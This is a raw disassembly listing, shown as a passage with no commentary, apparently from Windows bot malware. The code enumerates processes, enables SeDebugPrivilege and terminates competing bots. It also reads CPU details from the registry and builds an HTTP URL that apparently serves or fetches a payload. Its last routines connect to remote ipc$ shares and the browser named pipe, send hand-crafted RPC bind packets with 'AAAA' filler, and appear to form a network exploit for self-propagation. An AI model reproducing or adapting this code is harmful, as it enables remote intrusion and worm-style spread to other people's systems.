push offset aKernel32_dll_3 ; "kernel32.dll"
mov ds:dword_426574, eax
call edi
push eax
call esi
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov ds:dword_426578, eax
call edi
push eax
call esi
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov ds:dword_42657C, eax
call edi
push eax
call esi
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov ds:dword_426568, eax
call edi
push eax
call esi
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov ds:dword_426584, eax
call edi
push eax
call esi
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov ds:dword_42656C, eax
call edi
push eax
call esi
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov ds:dword_426590, eax
call edi
push eax
call esi
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov ds:dword_426570, eax
call ds:dword_41D0E8
push eax
call esi
cmp ds:dword_426580, ebx
mov ds:dword_426588, eax
jz loc_41A36B
cmp ds:dword_42658C, ebx
jz loc_41A36B
cmp ds:dword_426574, ebx
jz loc_41A36B
cmp ds:dword_426578, ebx
jz loc_41A36B
cmp ds:dword_42657C, ebx
jz loc_41A36B
cmp ds:dword_426568, ebx
jz loc_41A36B
cmp ds:dword_426584, ebx
jz loc_41A36B
cmp ds:dword_42656C, ebx
jz loc_41A36B
cmp ds:dword_426590, ebx
jz loc_41A36B
cmp ds:dword_426570, ebx
jz loc_41A36B
cmp eax, ebx
jz loc_41A36B
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F4
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A087: ; CODE XREF: sub_419EA0+238�j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_2 ; "%s\\%s"
lea eax, [esp+esi+584h+var_210]
push 103h
push eax
call sub_402AEE
lea eax, [esp+esi+58Ch+var_210]
add esp, 14h
lea ecx, [eax+1]
loc_41A0B9: ; CODE XREF: sub_419EA0+21E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A0B9
add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+var_210], bl
jb short loc_41A087
loc_41A0DA: ; CODE XREF: sub_419EA0+4C6�j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call ds:dword_426574
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call ds:dword_426578
test eax, eax
jz loc_41A35B
jmp loc_41A344
; ---------------------------------------------------------------------------
loc_41A108: ; CODE XREF: sub_419EA0+4B5�j
mov edi, ds:dword_41D104
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi
mov esi, ds:dword_41D038
push eax
call esi
test eax, eax
jnz short loc_41A15C
call ds:dword_41D0F0
cmp eax, 3F0h
jnz short loc_41A158
push 2
call ds:dword_41D030
test eax, eax
jnz short loc_41A147
mov [esp+578h+var_569], bl
loc_41A147: ; CODE XREF: sub_419EA0+2A1�j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi
push eax
call esi
test eax, eax
jnz short loc_41A15C
loc_41A158: ; CODE XREF: sub_419EA0+295�j
mov [esp+578h+var_569], bl
loc_41A15C: ; CODE XREF: sub_419EA0+288�j
; sub_419EA0+2B6�j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
add esp, 0Ch
test al, al
jnz short loc_41A181
push [esp+578h+var_564]
call ds:dword_41D0DC
mov [esp+578h+var_569], bl
loc_41A181: ; CODE XREF: sub_419EA0+2D1�j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call ds:dword_42658C
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A19D
mov [esp+578h+var_569], bl
loc_41A19D: ; CODE XREF: sub_419EA0+2F7�j
mov esi, 104h
push esi
lea eax, [esp+57Ch+var_420]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+57Ch+var_420]
push eax
push ebx
push [esp+584h+var_568]
call ds:dword_426588
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+var_210]
loc_41A1D3: ; CODE XREF: sub_419EA0+352�j
lea eax, [esp+578h+var_420]
push eax
push edi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41A1F6
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41A1D3
jmp short loc_41A1FA
; ---------------------------------------------------------------------------
loc_41A1F6: ; CODE XREF: sub_419EA0+345�j
mov [esp+578h+var_569], bl
loc_41A1FA: ; CODE XREF: sub_419EA0+354�j
cmp [esp+578h+var_569], bl
jz loc_41A32A
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41A32A
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz loc_41A32A
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz loc_41A32A
push eax
push esi
call sub_4199AC
cmp al, bl
pop ecx
pop ecx
jz loc_41A32A
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_419A10
test al, al
pop ecx
jz loc_41A30F
push [esp+578h+var_554]
call sub_402648
cmp eax, ebx
pop ecx
jnz short loc_41A293
push ebx
jmp short loc_41A309
; ---------------------------------------------------------------------------
loc_41A293: ; CODE XREF: sub_419EA0+3EE�j
push eax
push [esp+57Ch+var_554]
push [esp+580h+var_558]
push [esp+584h+var_568]
call sub_4198D2
add esp, 10h
cmp al, bl
jz short loc_41A30F
push 100h
call sub_402648
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+var_420]
push eax
push [esp+580h+var_568]
call sub_419E55
add esp, 0Ch
test al, al
jz short loc_41A308
push esi
call sub_402A45
pop ecx
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
lea eax, [esp+578h+var_420]
push eax
push offset aBotKilledS ; "Bot Killed: %s"
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 14h
xor ebx, ebx
loc_41A308: ; CODE XREF: sub_419EA0+434�j
push esi
loc_41A309: ; CODE XREF: sub_419EA0+3F1�j
call sub_402B9B
pop ecx
loc_41A30F: ; CODE XREF: sub_419EA0+3DC�j
; sub_419EA0+40A�j
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz short loc_41A32A
push eax
push esi
call sub_419948
pop ecx
pop ecx
loc_41A32A: ; CODE XREF: sub_419EA0+35E�j
; sub_419EA0+386�j ...
push [esp+578h+var_564]
mov esi, ds:dword_41D0DC
call esi
push [esp+578h+var_568]
call esi
push 1
call ds:dword_41D0FC
loc_41A344: ; CODE XREF: sub_419EA0+263�j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call ds:dword_42657C
test eax, eax
jnz loc_41A108
loc_41A35B: ; CODE XREF: sub_419EA0+25D�j
push 927C0h
call ds:dword_41D0FC
jmp loc_41A0DA
; ---------------------------------------------------------------------------
loc_41A36B: ; CODE XREF: sub_419EA0+14F�j
; sub_419EA0+15B�j ...
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_419EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41A391 proc near ; CODE XREF: sub_401CC0+E0�p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi
push eax
call sub_407B70
push 4
push offset dword_426BE8
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax
push 4
call sub_416ECD
add esp, 20h
test al, al
jz loc_41A5A9
push ebx
lea eax, [ebp+2C4h+var_334]
push eax
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz loc_41A4E9
mov edi, 0FFh
push edi
lea eax, [ebp+2C4h+var_133]
push esi
push eax
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+var_134], 0
call sub_407B70
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_7 ; "%s"
lea eax, [ebp+2C4h+var_134]
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_134]
add esp, 1Ch
lea esi, [eax+1]
loc_41A45C: ; CODE XREF: sub_41A391+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A45C
sub eax, esi
push ebx
push 0
mov esi, offset byte_426AE8
push esi
mov [ebp+eax+2C4h+var_134], cl
call sub_407B70
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41A482: ; CODE XREF: sub_41A391+154�j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41A499
cmp [ebp+ecx+2C4h+var_134], 20h
jz short loc_41A4C9
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A391+F5�j
movsx eax, [ebp+ecx+2C4h+var_134]
push eax
push esi
push offset aSC_0 ; "%s%c"
push edi
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41A4B7: ; CODE XREF: sub_41A391+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4B7
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov ds:byte_426AE8[eax], dl
loc_41A4C9: ; CODE XREF: sub_41A391+FF�j
; sub_41A391+106�j
lea eax, [ebp+2C4h+var_134]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41A4D9: ; CODE XREF: sub_41A391+14D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4D9
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41A482
jmp short loc_41A51C
; ---------------------------------------------------------------------------
loc_41A4E9: ; CODE XREF: sub_41A391+85�j
push ebx
push esi
mov esi, offset byte_426AE8
push esi
call sub_407B70
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi
push esi
call sub_402AEE
add esp, 18h
lea eax, [esi+1]
loc_41A50D: ; CODE XREF: sub_41A391+181�j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A50D
sub esi, eax
mov ds:byte_426AE8[esi], cl
loc_41A51C: ; CODE XREF: sub_41A391+156�j
and ds:dword_426BEC, 0
mov [ebp+2C4h+var_33C], 1
loc_41A52A: ; CODE XREF: sub_41A391+20D�j
inc ds:dword_426BEC
push ebx
lea eax, [ebp+2C4h+var_234]
push 0
push eax
call sub_407B70
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41A560: ; CODE XREF: sub_41A391+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A560
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_41A5A0
push [ebp+2C4h+var_340]
call ds:dword_41D010
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41A52A
loc_41A5A0: ; CODE XREF: sub_41A391+1FB�j
push [ebp+2C4h+var_340]
call ds:dword_41D010
loc_41A5A9: ; CODE XREF: sub_41A391+62�j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 2C4h
leave
retn
sub_41A391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5C1 proc near ; CODE XREF: sub_41A8D5+B7�p
var_518 = dword ptr -518h
var_508 = dword ptr -508h
var_504 = byte ptr -504h
var_501 = byte ptr -501h
var_390 = byte ptr -390h
var_38D = byte ptr -38Dh
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_508], eax
mov eax, ds:dword_41EF64
mov [ebp+var_C], eax
mov eax, ds:dword_41EF68
mov esi, offset dword_41EF6C
lea edi, [ebp+var_504]
mov ebx, 16Fh
movsw
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_501]
push 0
push eax
movsb
call sub_407B70
mov esi, offset dword_41EF70
lea edi, [ebp+var_390]
movsw
movsb
push ebx
xor esi, esi
lea eax, [ebp+var_38D]
push esi
push eax
call sub_407B70
xor eax, eax
mov [ebp+var_1C], 0
lea edi, [ebp+var_1B]
stosd
stosd
stosd
stosw
stosb
mov edi, 0FFh
push edi
lea eax, [ebp+var_21B]
push esi
push eax
mov [ebp+var_21C], 0
call sub_407B70
push edi
lea eax, [ebp+var_11B]
push esi
push eax
mov [ebp+var_11C], 0
call sub_407B70
add esp, 30h
cmp [ebp+arg_4], 0
jz short loc_41A6F1
call sub_419347
test al, al
jnz short loc_41A6D9
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A6D0: ; CODE XREF: sub_41A5C1+114�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A6D0
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A6D9: ; CODE XREF: sub_41A5C1+BD�j
push 100h
lea esi, [ebp+var_11C]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41A752
; ---------------------------------------------------------------------------
loc_41A6F1: ; CODE XREF: sub_41A5C1+B4�j
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A741: ; CODE XREF: sub_41A5C1+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A741
loc_41A748: ; CODE XREF: sub_41A5C1+116�j
sub eax, edx
mov [ebp+eax+var_11C], 0
loc_41A752: ; CODE XREF: sub_41A5C1+12E�j
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_504]
push eax
call sub_41432A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_41A774
loc_41A76D: ; CODE XREF: sub_41A5C1+1EB�j
xor eax, eax
jmp loc_41A8C6
; ---------------------------------------------------------------------------
loc_41A774: ; CODE XREF: sub_41A5C1+1AA�j
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
lea ebx, [ebp+var_390]
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41A7AE
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz short loc_41A76D
loc_41A7AE: ; CODE XREF: sub_41A5C1+1D1�j
mov ebx, [ebp+var_508]
push 9
pop ecx
xor eax, eax
mov edi, ebx
stosd
push 0FFh
lea eax, [ebx+24h]
push 61h
mov esi, offset dword_4245DC
mov edi, ebx
push eax
rep movsd
call sub_407B70
mov esi, 101h
push esi
lea eax, [ebx+123h]
push 62h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+224h]
push esi
stosw
lea eax, [ebx+226h]
push 22h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+327h]
stosw
lea edi, [ebx+42Ah]
add esp, 24h
and [ebp+var_8], 0
mov [ebp+var_508], edi
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A827: ; CODE XREF: sub_41A5C1+29B�j
mov edi, [ebp+var_508]
loc_41A82D: ; CODE XREF: sub_41A5C1+264�j
mov eax, [ebp+var_8]
add eax, 64h
push esi
push eax
lea eax, [edi-101h]
push eax
call sub_407B70
add [ebp+var_508], 103h
add esp, 0Ch
inc [ebp+var_8]
cmp [ebp+var_8], 8
mov eax, 1010101h
stosw
jl short loc_41A827
push 9
pop ecx
mov eax, 6C6C6C6Ch
lea edi, [ebx+0B41h]
rep stosd
stosb
lea edi, [ebx+0B66h]
mov esi, offset dword_424604
movsd
movsd
lea eax, [ebp+var_390]
movsw
mov esi, ds:dword_41D0A4
push eax
call esi
push eax
lea eax, [ebp+var_390]
push eax
lea eax, [ebx+0B70h]
push eax
call sub_407BF0
add esp, 0Ch
push 54Ah
push 6Dh
lea eax, [ebp+var_390]
push eax
call esi
lea eax, [eax+ebx+0B70h]
push eax
call sub_407B70
add esp, 0Ch
mov eax, ebx
loc_41A8C6: ; CODE XREF: sub_41A5C1+1AE�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=12BCh
sub_41A8D5 proc near ; DATA XREF: .kSjx934:004245A8�o
var_133C = byte ptr -133Ch
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_122F = dword ptr -122Fh
var_1228 = word ptr -1228h
var_1226 = word ptr -1226h
var_1224 = dword ptr -1224h
var_1218 = byte ptr -1218h
var_1217 = byte ptr -1217h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-12BCh]
mov eax, 133Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+12BCh+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+12BCh+arg_0]
lea edi, [ebp+12BCh+var_133C]
rep movsd
mov esi, 1211h
push esi
lea eax, [ebp+12BCh+var_1217]
push 0
push eax
mov [ebp+12BCh+var_1218], 0
call sub_407B70
mov eax, [ebp+12BCh+var_1238]
add esp, 0Ch
push [ebp+12BCh+var_1234]
mov [ebp+12BCh+var_1228], 2
mov [ebp+12BCh+var_1224], eax
call ds:dword_41D278
push 6
push 1
push 2
mov [ebp+12BCh+var_1226], ax
call ds:dword_41D27C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A961
loc_41A95D: ; CODE XREF: sub_41A8D5+A8�j
xor al, al
jmp short loc_41A9C7
; ---------------------------------------------------------------------------
loc_41A961: ; CODE XREF: sub_41A8D5+86�j
push 10h
lea eax, [ebp+12BCh+var_1228]
push eax
push edi
call ds:dword_41D240
cmp eax, 0FFFFFFFFh
jnz short loc_41A97F
loc_41A976: ; CODE XREF: sub_41A8D5+C0�j
push edi
loc_41A977: ; CODE XREF: sub_41A8D5+D7�j
call ds:dword_41D224
jmp short loc_41A95D
; ---------------------------------------------------------------------------
loc_41A97F: ; CODE XREF: sub_41A8D5+9F�j
push [ebp+12BCh+var_122F]
lea eax, [ebp+12BCh+var_1218]
push eax
call sub_41A5C1
test eax, eax
pop ecx
pop ecx
jz short loc_41A976
push 0
push esi
lea eax, [ebp+12BCh+var_1218]
push eax
push edi
call ds:dword_41D228
cmp eax, 0FFFFFFFFh
push edi
jz short loc_41A977
call ds:dword_41D224
mov eax, [ebp+12BCh+var_123C]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
loc_41A9C7: ; CODE XREF: sub_41A8D5+8A�j
mov ecx, [ebp+12BCh+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 12BCh
leave
retn
sub_41A8D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9DE proc near ; CODE XREF: .kSjx934:00413C39�p
; .kSjx934:00413D4A�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_3C = dword ptr 44h
arg_40 = byte ptr 48h
arg_4C = dword ptr 54h
arg_50 = byte ptr 58h
arg_54 = byte ptr 5Ch
arg_68 = dword ptr 70h
arg_78 = dword ptr 80h
arg_7C = word ptr 84h
arg_80 = dword ptr 88h
arg_84 = word ptr 8Ch
arg_88 = dword ptr 90h
arg_8C = dword ptr 94h
arg_90 = word ptr 98h
arg_94 = byte ptr 9Ch
arg_98 = dword ptr 0A0h
arg_9C = dword ptr 0A4h
arg_A0 = dword ptr 0A8h
arg_A4 = dword ptr 0ACh
arg_A8 = byte ptr 0B0h
arg_AC = word ptr 0B4h
arg_AE = word ptr 0B6h
arg_B0 = dword ptr 0B8h
arg_B4 = word ptr 0BCh
arg_B6 = word ptr 0BEh
arg_B8 = dword ptr 0C0h
arg_BC = dword ptr 0C4h
arg_C0 = word ptr 0C8h
arg_C2 = byte ptr 0CAh
arg_C4 = byte ptr 0CCh
arg_D4 = dword ptr 0DCh
arg_D8 = byte ptr 0E0h
arg_E8 = dword ptr 0F0h
arg_EC = byte ptr 0F4h
arg_1EC = dword ptr 1F4h
arg_1F0 = dword ptr 1F8h
arg_1F8 = dword ptr 200h
arg_1FD = byte ptr 205h
arg_200 = byte ptr 208h
arg_201 = byte ptr 209h
arg_210 = byte ptr 218h
arg_211 = byte ptr 219h
arg_310 = byte ptr 318h
arg_311 = byte ptr 319h
arg_40C = byte ptr 414h
arg_240C = byte ptr 2414h
arg_4410 = byte ptr 4418h
arg_6410 = dword ptr 6418h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, esp
mov [esp+arg_6410], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+0Ch+arg_EC]
rep movsd
mov eax, [esp+0Ch+arg_1F0]
push eax
mov [esp+10h+arg_20], eax
call ds:dword_41D260
xor ebx, ebx
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_4], ebx
loc_41AA2A: ; CODE XREF: sub_41A9DE+722�j
cmp [esp+0Ch+arg_4], 2
ja loc_41B10F
push offset a_ ; "."
push [esp+10h+arg_C]
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41AA9D
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_40C]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+10h+arg_54]
rep stosd
lea eax, [esp+10h+arg_40C]
push offset byte_41EEEE
mov [esp+14h+arg_68], eax
push offset byte_41EEEF
lea eax, [esp+18h+arg_54]
push eax
call sub_402642
test eax, eax
jnz loc_41B10F
loc_41AA9D: ; CODE XREF: sub_41A9DE+69�j
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_240C]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+24h+arg_240C]
push eax
call ds:dword_41D06C
cmp eax, 0FFFFFFFFh
mov [esp+10h], eax
jz loc_41B10F
push 48h
lea eax, [esp+10h+arg_A4]
push ebx
push eax
call sub_407B70
mov byte ptr [esp+18h+arg_A4], 5
mov byte ptr [esp+18h+arg_A4+1], bl
mov byte ptr [esp+18h+arg_A4+2], 0Bh
mov byte ptr [esp+18h+arg_A4+3], 3
mov dword ptr [esp+18h+arg_A8], 10h
mov [esp+18h+arg_AC], 48h
mov [esp+18h+arg_AE], bx
mov [esp+18h+arg_B0], ebx
mov [esp+18h+arg_B4], 10B8h
mov [esp+18h+arg_B6], 10B8h
mov [esp+18h+arg_B8], ebx
mov [esp+18h+arg_BC], 1
mov [esp+18h+arg_C0], bx
mov [esp+18h+arg_C2], 1
mov esi, offset dword_41F02C
lea edi, [esp+18h+arg_C4]
movsd
movsd
movsd
movsd
mov [esp+18h+arg_D4], 3
mov esi, offset dword_41F040
lea edi, [esp+18h+arg_D8]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+10h+arg_50]
push eax
push 48h
lea eax, [esp+18h+arg_A4]
push eax
push dword ptr [esp+20h]
mov [esp+20h+arg_E8], esi
call ds:dword_41D088
test eax, eax
jz loc_41B105
push ebx
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
call ds:dword_41D108
push eax
call sub_403356
mov edx, 41414141h
mov eax, edx
lea edi, [esp+0Ch+arg_94]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+8+arg_78]
rep stosd
call sub_403363
mov dword ptr [esp+8+arg_94], eax
xor eax, eax
inc eax
cmp [esp+8+arg_8], eax
mov [esp+8+arg_A0], eax
mov [esp+8+arg_9C], ebx
mov [esp+8+arg_98], eax
mov word ptr [esp+8+arg_A4], bx
jnz short loc_41AC5D
mov dword ptr [esp+8+arg_84], eax
mov dword ptr [esp+8+arg_7C], eax
mov [esp+8+arg_88], ebx
jmp short loc_41AC7C
; ---------------------------------------------------------------------------
loc_41AC5D: ; CODE XREF: sub_41A9DE+266�j
cmp [esp+8+arg_8], ebx
jnz short loc_41AC83
mov dword ptr [esp+8+arg_84], esi
mov dword ptr [esp+8+arg_7C], esi
mov [esp+8+arg_88], 2EBh
loc_41AC7C: ; CODE XREF: sub_41A9DE+27D�j
mov [esp+8+arg_80], ebx
loc_41AC83: ; CODE XREF: sub_41A9DE+283�j
call sub_403363
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+8+arg_78], edx
call sub_403363
cdq
idiv esi
mov eax, [esp+8+arg_8]
shl eax, 4
mov edi, ds:dword_424628[eax]
push edi
mov dword ptr [esp+0Ch+arg_90], ebx
mov [esp+0Ch+arg_1C], eax
mov [esp+0Ch+arg_18], edi
inc edx
mov [esp+0Ch+arg_8C], edx
call sub_4036E0
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+8+arg_4], esi
jz loc_41B105
lea eax, [edi-2]
push eax
push 90h
push esi
call sub_407B70
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_424630[eax]
lea edi, [eax+esi]
mov esi, offset dword_42461C
movsd
movsw
add eax, 7
movsb
mov [esp+14h+arg_14], eax
xor eax, eax
mov [esp+14h+arg_200], bl
lea edi, [esp+14h+arg_201]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi
lea eax, [esp+0Ch+arg_311]
push ebx
push eax
mov [esp+14h+arg_310], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+0Ch+arg_211]
push ebx
push eax
mov [esp+14h+arg_210], bl
call sub_407B70
add esp, 0Ch
cmp [esp+8+arg_1FD], bl
jz loc_41ADF3
call sub_419347
test al, al
jnz short loc_41ADDA
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
